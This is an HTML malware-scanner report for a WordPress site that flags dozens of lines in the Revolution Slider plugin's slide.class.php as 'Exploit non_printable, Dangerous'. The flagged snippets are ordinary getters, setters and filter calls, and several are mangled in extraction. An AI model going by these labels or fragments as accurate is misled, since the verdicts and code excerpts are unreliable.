<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$post_templates</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 95</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">add_post_templates</span><span style="color: #007700">( </span><span style="color: #0000BB">$templates </span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_542").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/wp-content/plugins/revslider/includes/slide.class.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 107.37 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2022-02-24 03:40:58</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-07 10:03:36</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 146</span><br><table id="file_543" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_image_path_from_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$url</span><span style="color: #007700">){ </span><span style="color: #0000BB">$path </span><span style="color: #007700">= </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_base_url</span><span style="color: #007700">(), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$url</span><span style="color: #007700">); return </span><span style="color: #0000BB">$path</span><span style="color: #007700">; } }</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1007</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return = </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_slide_initByStreamData_sourceType'</span><span style="color: #007700">, </span><span style="color: #0000BB">false</span><span style="color: #007700">, </span><span style="color: #0000BB">$a</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1009</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return === </span><span style="color: #0000BB">false</span><span style="color: #007700">) </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">throw_error</span><span style="color: #007700">(</span><span style="color: #0000BB">__</span><span style="color: #007700">(</span><span style="color: #DD0000">'Source must be from Stream'</span><span style="color: #007700">, </span><span style="color: #DD0000">'revslider'</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_by_facebook</span><span style="color: #007700">(</span><span style="color: #0000BB">$slider_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$additions</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1064</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_by_twitter</span><span style="color: #007700">(</span><span style="color: #0000BB">$slider_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$additions</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 107</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_id</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">id</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 115</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_id</span><span style="color: #007700">(</span><span style="color: #0000BB">$id</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1167</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_by_instagram</span><span style="color: #007700">(</span><span style="color: #0000BB">$slider_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$additions </span><span style="color: #007700">= array()){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1230</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_by_flickr</span><span style="color: #007700">(</span><span style="color: #0000BB">$slider_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$additions</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 123</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_title</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 124</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_param</span><span style="color: #007700">(</span><span style="color: #DD0000">'title'</span><span style="color: #007700">, </span><span style="color: #DD0000">'Slide'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1286</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_by_youtube</span><span style="color: #007700">(</span><span style="color: #0000BB">$slider_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$additions</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 12</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Functions </span><span style="color: #007700">{</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_slider_id</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">slider_id</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1359</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">init_by_vimeo</span><span style="color: #007700">(</span><span style="color: #0000BB">$slider_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$additions</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 136</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns </span><span style="color: #007700">if </span><span style="color: #0000BB">the Slide is a </span><span style="color: #007700">static </span><span style="color: #0000BB">slide </span><span style="color: #007700">or </span><span style="color: #0000BB">not</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 138</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">is_static_slide</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">static_slide</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1402</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_stream_data</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$attr</span><span style="color: #007700">, </span><span style="color: #0000BB">$stream_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$additions </span><span style="color: #007700">= array(), </span><span style="color: #0000BB">$is_action </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 146</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_child_ids</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1494</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_slide_set_stream_data_post'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$attr</span><span style="color: #007700">, </span><span style="color: #0000BB">$stream_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$additions</span><span style="color: #007700">, </span><span style="color: #0000BB">$is_action</span><span style="color: #007700">, </span><span style="color: #0000BB">$img_sizes</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1503</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_layers_by_stream</span><span style="color: #007700">(</span><span style="color: #0000BB">$slider_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$stream_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$additions </span><span style="color: #007700">= array()){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1507</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_stream_data</span><span style="color: #007700">(</span><span style="color: #0000BB">$stream_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$additions</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 155</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ids</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1562</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns the data of the selected stream</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1564</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">return_stream_data</span><span style="color: #007700">(</span><span style="color: #0000BB">$stream_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$additions </span><span style="color: #007700">= array()){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1567</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">return_stream_data_pre</span><span style="color: #DD0000">', $attr, $stream_type, $additions, $img_sizes);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 162</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_order</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 163</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">order</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 171</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_settings</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 172</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_slide_get_settings'</span><span style="color: #007700">, </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_slide_getSettings'</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">settings</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">), </span><span style="color: #0000BB">$this</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1788</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_slide_return_stream_data_post'</span><span style="color: #007700">, </span><span style="color: #0000BB">$attr</span><span style="color: #007700">, </span><span style="color: #0000BB">$stream_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$additions</span><span style="color: #007700">, </span><span style="color: #0000BB">$img_sizes</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1795</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_facebook_timeline_image</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1796</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return = </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 179</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_params</span><span style="color: #007700">(</span><span style="color: #0000BB">$params</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1801</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return = </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_val</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">post_data</span><span style="color: #007700">, </span><span style="color: #DD0000">'full_picture'</span><span style="color: #007700">, </span><span style="color: #DD0000">''</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return = </span><span style="color: #DD0000">'https://graph.facebook.com/'</span><span style="color: #007700">.</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_val</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">post_data</span><span style="color: #007700">, </span><span style="color: #DD0000">'object_id'</span><span style="color: #007700">, </span><span style="color: #DD0000">''</span><span style="color: #007700">).</span><span style="color: #DD0000">'/picture'</span><span style="color: #007700">;</span><span style="color: #FF8000">//$photo->picture;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1814</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returned </span><span style="color: #007700">as </span><span style="color: #DD0000">"fbstaging://" </span><span style="color: #007700">*/</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1828</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return = </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">get_val</span><span style="color: #007700">(</span><span style="color: #0000BB">$image_url</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1831</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">apply_filters</span><span style="color: #007700">(</span><span style="color: #DD0000">'revslider_slide_get_facebook_timeline_image'</span><span style="color: #007700">, </span><span style="color: #0000BB">$return</span><span style="color: #007700">, </span><span style="color: #0000BB">$object_id</span><span style="color: #007700">, </span><span style="color: #0000BB">$picture</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1838</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">decode_facebook_url</span><span style="color: #007700">(</span><span style="color: #0000BB">$url</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1846</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$url</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1855</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">save_layers</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1870</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_param</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 187</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">get_params</span><span style="color: #007700">(){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1887</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set_param</span><span style="color: #007700">(</span><span style="color: #0000BB">$keys</span><span style="color: #007700">, </span><span style="color: #0000BB">$value</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 188</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
